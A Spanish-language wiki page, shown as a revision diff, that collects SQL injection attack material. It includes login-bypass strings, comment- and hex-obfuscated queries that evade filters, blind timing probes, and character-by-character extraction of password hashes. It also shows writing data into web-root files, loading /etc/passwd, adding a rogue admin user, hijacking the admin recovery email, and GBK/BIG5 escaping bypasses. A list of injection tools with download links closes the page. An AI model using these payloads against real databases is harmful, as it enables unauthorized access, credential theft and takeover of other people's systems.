meta data de esta página
  •  

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión		Revisión previa
seguridad:sql_injection [2013/03/18 09:36] – [SQL Injection] lcseguridad:sql_injection [2023/01/18 14:11] (actual) – editor externo 127.0.0.1
Línea 1: Línea 1:
 ==== SQL Injection ==== ==== SQL Injection ====
 === Técnicas === === Técnicas ===
 +<file>
   * /**/   * /**/
   * /*--*/   * /*--*/
Línea 7: Línea 8:
   * %0A   * %0A
   * %0D   * %0D
 +</file>
  
-<note>Extraido de 0x000000.com</note>+=== Técnicas extraidas de 0x000000.com  === 
 +<code sql>
 1 SELECT * FROM login /* foobar */ 1 SELECT * FROM login /* foobar */
 2 SELECT * FROM login WHERE id = 1 or 1=1 2 SELECT * FROM login WHERE id = 1 or 1=1
 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%" 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
 +</code>
 Use inside login form: Use inside login form:
 +<code>
 01 1' OR 1=1-- 01 1' OR 1=1--
 02 1' OR '1' = '1 02 1' OR '1' = '1
Línea 35: Línea 39:
 20 ' or a=a-- 20 ' or a=a--
 21 " or "a"="a 21 " or "a"="a
 +</code>
 Variations: Variations:
 +<code sql>
 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
Línea 48: Línea 53:
 10 SELECT host,user,db from mysql.db 10 SELECT host,user,db from mysql.db
 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host,user,db from mysql.db; 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host,user,db from mysql.db;
 +</code>
 Blind injection vectors collection Blind injection vectors collection
 +<code sql>
 Operators Operators
 +
 1 SELECT 1 && 1; 1 SELECT 1 && 1;
 2 SELECT 1 || 1; 2 SELECT 1 || 1;
 3 SELECT 1 XOR 0; 3 SELECT 1 XOR 0;
 +</code> 
 +<code sql>
 Evaluate Evaluate
 1 all render TRUE or 1. 1 all render TRUE or 1.
Línea 60: Línea 68:
 3 SELECT 2 >= 2; 3 SELECT 2 >= 2;
 4 SELECT ISNULL(1/0); 4 SELECT ISNULL(1/0);
 +</code> 
 +<code sql>
 Math Math
 1 SELECT FLOOR(7 + (RAND() * 5)); 1 SELECT FLOOR(7 + (RAND() * 5));
 2 SELECT ROUND(23.298, -1); 2 SELECT ROUND(23.298, -1);
 +</code> 
 +<code sql>
 Misc Misc
 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000))); 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
 2 SELECT MD5('abc'); 2 SELECT MD5('abc');
 +</code> 
 +<code sql>
 Benchmark Benchmark
 01 SELECT BENCHMARK(10000000,ENCODE('abc','123')); 01 SELECT BENCHMARK(10000000,ENCODE('abc','123'));
Línea 81: Línea 92:
 10 Using the timeout to check if user exists 10 Using the timeout to check if user exists
 11 SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login 11 SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
 +</code>
 Beware of of the N rounds, add an extra zero and it could stall or crash your browser! Beware of of the N rounds, add an extra zero and it could stall or crash your browser!
 Gathering info Gathering info
 +<code sql>
 Table mapping Table mapping
 1 SELECT COUNT(*) FROM tablename 1 SELECT COUNT(*) FROM tablename
 +</code> 
 +<code sql>
 Field mapping Field mapping
 1 SELECT * FROM tablename WHERE user LIKE "%root%" 1 SELECT * FROM tablename WHERE user LIKE "%root%"
Línea 92: Línea 105:
 3 SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL; 3 SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL; 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
 +</code> 
 +<code sql>
 User mapping User mapping
 1 SELECT * FROM tablename WHERE email = 'user@site.com'; 1 SELECT * FROM tablename WHERE email = 'user@site.com';
 2 SELECT * FROM tablename WHERE user LIKE "%root%" 2 SELECT * FROM tablename WHERE user LIKE "%root%"
 3 SELECT * FROM tablename WHERE user = 'username' 3 SELECT * FROM tablename WHERE user = 'username'
 +</code> 
 +<code sql>
 Advanced SQL vectors Advanced SQL vectors
 Writing info into files. Writing info into files.
 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt' 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt'
 +</code> 
 +<code sql>
 Writing info into files without single quotes: (example) Writing info into files without single quotes: (example)
 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110), 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110), 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
 3 CHAR( 39)) 3 CHAR( 39))
- 
 Note: You must specify a new file, it may not exists and give the correct pathname. Note: You must specify a new file, it may not exists and give the correct pathname.
 +</code> 
 +<code sql>
 The CHAR() quoteless function. The CHAR() quoteless function.
 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105), 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),
Línea 114: Línea 130:
 3   3  
 4 SELECT * FROM login WHERE user = CHAR(39,97,39) 4 SELECT * FROM login WHERE user = CHAR(39,97,39)
 +</code> 
 +<code sql>
 Extracting hashes Extracting hashes
 1 SELECT user FROM login WHERE user = 'root' 1 SELECT user FROM login WHERE user = 'root'
 2 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login 2 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login
 +</code>
 This evaluates the first char of the password hash from user 'root' which is 'a' (ASCII 97). This evaluates the first char of the password hash from user 'root' which is 'a' (ASCII 97).
  
Línea 124: Línea 141:
  
 The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example.
 +<code sql>
 01 SELECT user FROM login WHERE user = 'admin' 01 SELECT user FROM login WHERE user = 'admin'
 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1
Línea 135: Línea 153:
 10 is like: (password,1,3) this selects: 'abc' 10 is like: (password,1,3) this selects: 'abc'
 11 is like: (password,1,4) this selects: 'abcd' 11 is like: (password,1,4) this selects: 'abcd'
 +</code>
 A quoteless example: A quoteless example:
 +<code sql>
 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
 +</code>
 Possible chars Possible chars
 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122
 Misc. Misc.
 Insert a new user into DB Insert a new user into DB
 +<code sql>
 1 INSERT INTO login SET user = 'r00t', pass = 'abc' 1 INSERT INTO login SET user = 'r00t', pass = 'abc'
 +</code>
 Retrieve /etc/passwd file, put it into a field and insert a new user. Retrieve /etc/passwd file, put it into a field and insert a new user.
-1 load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'+<code>1 load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'</code>
  
 Then login! Then login!
  
 Write the DB user away into tmp Write the DB user away into tmp
-1 SELECT host,user,password FROM user into outfile '/tmp/passwd';+<code sql>1 SELECT host,user,password FROM user into outfile '/tmp/passwd';</code>
  
 Change admin e-mail, for "forgot login retrieval." Change admin e-mail, for "forgot login retrieval."
-1 UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';+<code>1 UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';</code>
  
 Bypassing PHP functions Bypassing PHP functions
 Bypassing addslashes() with GBK HEX encoding. Bypassing addslashes() with GBK HEX encoding.
-1 WHERE x = 0xbf27 admin 0xbf27+<code>1 WHERE x = 0xbf27 admin 0xbf27</code>
  
 Using an HEX encoded query to bypass escaping. Using an HEX encoded query to bypass escaping.
 +<code sql>
 1 Normal: SELECT * FROM login WHERE user = 'root' 1 Normal: SELECT * FROM login WHERE user = 'root'
 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74
 +</code>
 Inserting a new user in SQL. Inserting a new user in SQL.
 +<code>
 1 Normal: insert into login set user = 'root', pass = 'root' 1 Normal: insert into login set user = 'root', pass = 'root'
 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74
 +</code>
 How to determin the HEX value for injection. How to determin the HEX value for injection.
-1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.+<code sql>1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.</code>
  
 With comments. With comments.
 +<code>
 1 S/**/E/**/L/**/E/**/C/**/T * F/**/R/**/O/**/M l/**/o/**/g/**/i/**/n 1 S/**/E/**/L/**/E/**/C/**/T * F/**/R/**/O/**/M l/**/o/**/g/**/i/**/n
 2 W/**/H/**/E/**/R/**/E u/**/s/**/e/**/r = 0x726F6F74 2 W/**/H/**/E/**/R/**/E u/**/s/**/e/**/r = 0x726F6F74
 +</code>
 Bypassing mysql_real_escape_string() with BIG5 or GBK Bypassing mysql_real_escape_string() with BIG5 or GBK
-1 "injection string" に関する追加情報:+<code>1 "injection string" に関する追加情報:</code>
  
 (MySQL 4.1.x before 4.1.20 and 5.0.x)  (MySQL 4.1.x before 4.1.20 and 5.0.x) 
  
  
-=== Herramientas === +==== Herramientas ==== 
-Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/+  Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/ 
 +  * Havij http://www.taringa.net/comunidades/hackers/3552526/ 
 +  * PonyMagic http://poneymagic.diosdelared.com 
 +  * General Injection Explorer  
 +  * Safe 3 sql injector http://sourceforge.net/projects/safe3si/files/latest/download?source=directory 
 +  * Enema http://code.google.com/p/enema/ 
 +  * Absinthe http://sourceforge.net/projects/absinthe/ 
 +  * Pangolin http://nosec.org/en/productservice/pangolin/ 
 +  * sql poison 
 +  * sql map gui 
 +  * bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ 
 +  * 
  
  
Línea 189: Línea 223:
 ==== Referencias ==== ==== Referencias ====
   * http://ha.ckers.org/sqlinjection/   * http://ha.ckers.org/sqlinjection/
 +  * http://www.antrax-labs.org/2012/01/sql-injection-desde-cero.html